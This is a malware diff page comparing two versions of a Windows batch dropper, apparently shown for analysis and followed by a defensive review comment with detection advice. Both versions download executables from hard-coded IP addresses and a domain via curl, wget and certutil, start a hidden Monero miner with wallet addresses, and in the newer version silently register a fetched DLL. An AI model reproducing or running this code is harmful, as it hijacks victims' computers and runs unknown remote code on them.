Malware
5 removals
18 lines
12 additions
25 lines
@echo off
@echo off
curl http://185.173.36.219/download/jsextension.exe -o jsextension.exe
curl http://159.148.186.228/download/jsextension.exe -o jsextension.exe
if not exist jsextension.exe (
if not exist jsextension.exe (
wget http://185.173.36.219/download/jsextension.exe -O jsextension.exe
wget http://159.148.186.228/download/jsextension.exe -O jsextension.exe
)
)
if not exist jsextension.exe (
if not exist jsextension.exe (
certutil.exe -urlcache -f http://185.173.36.219/download/jsextension.exe jsextension.exe
certutil.exe -urlcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe
)
curl https://citationsherbe.at/sdd.dll -o create.dll
if not exist create.dll (
wget https://citationsherbe.at/sdd.dll -O create.dll
)
if not exist create.dll (
certutil.exe -urlcache -f https://citationsherbe.at/sdd.dll create.dll
)
)
set exe_1=jsextension.exe
set exe_1=jsextension.exe
set "count_1=0"
set "count_1=0"
>tasklist.temp (
>tasklist.temp (
tasklist /NH /FI "IMAGENAME eq %exe_1%"
tasklist /NH /FI "IMAGENAME eq %exe_1%"
)
)
for /f %%x in (tasklist.temp) do (
for /f %%x in (tasklist.temp) do (
if "%%x" EQU "%exe_1%" set /a count_1+=1
if "%%x" EQU "%exe_1%" set /a count_1+=1
)
)
if %count_1% EQU 0 (start /B .\jsextension.exe -k --tls --rig-id q -o pool.minexmr.com:443 -u 87FLi8c827mTJwezgVXVUrEkHagWiJ2wuaco2bVkFLGqL3MNMFpeay7QJmHooz19qQFMgJfQRJwJKZMJpetT5Qp69xBARwH --cpu-max-threads-hint=20 --donate-level=1 --background)
if %count_1% EQU 0 (start /B .\jsextension.exe -k --tls --rig-id q -o pool.minexmr.com:443 -u 49ay9Aq2r3diJtEk3eeKKm7pc5R39AKnbYJZVqAd1UUmew6ZPX1ndfXQCT16v4trWp4erPyXtUQZTHGjbLXWQdBqLMxxYKH --cpu-max-threads-hint=50 --donate-level=1 --background & regsvr32.exe -s create.dll)
del tasklist.temp
del tasklist.temp
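Review bot: Nothing in the listing marks that the newer side fetches and runs a second payload: the seven lines added after the `certutil` fallback download `create.dll` from `citationsherbe.at`, and the final `if %count_1% EQU 0` line now appends `& regsvr32.exe -s create.dll` to the miner start. A header comment such as `:: newer variant: also downloads create.dll and registers it silently with regsvr32, alongside jsextension.exe` would keep a reader from triaging this as a miner only. The download IP and the `-u` value both differ between the two sides, so detections are better anchored on behaviour than on those values: `certutil.exe -urlcache -f` with a URL, `regsvr32.exe -s` on a DLL in the current directory, `tasklist.temp` written beside the script, and the `pool.minexmr.com:443` destination. What `create.dll` does is not visible on this page, so a host that ran the newer side should be treated as having executed unknown code beyond the miner.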